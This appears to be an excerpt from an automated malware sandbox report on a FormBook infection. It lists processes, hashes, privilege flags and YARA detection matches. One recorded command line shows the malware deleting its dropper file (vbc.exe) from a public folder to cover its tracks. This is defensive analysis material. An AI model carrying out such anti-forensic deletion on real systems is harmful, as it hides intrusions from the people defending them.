                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Analysis Process: raserver.exe PID: 2920 Parent PID: 1764

                                              General

                                              Start time:11:42:05
                                              Start date:15/09/2021
                                              Path:C:\Windows\SysWOW64\raserver.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                              Imagebase:0x7c0000
                                              File size:101888 bytes
                                              MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Analysis Process: cmd.exe PID: 3044 Parent PID: 2920

                                              General

                                              Start time:11:42:12
                                              Start date:15/09/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                              Imagebase:0x4a410000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >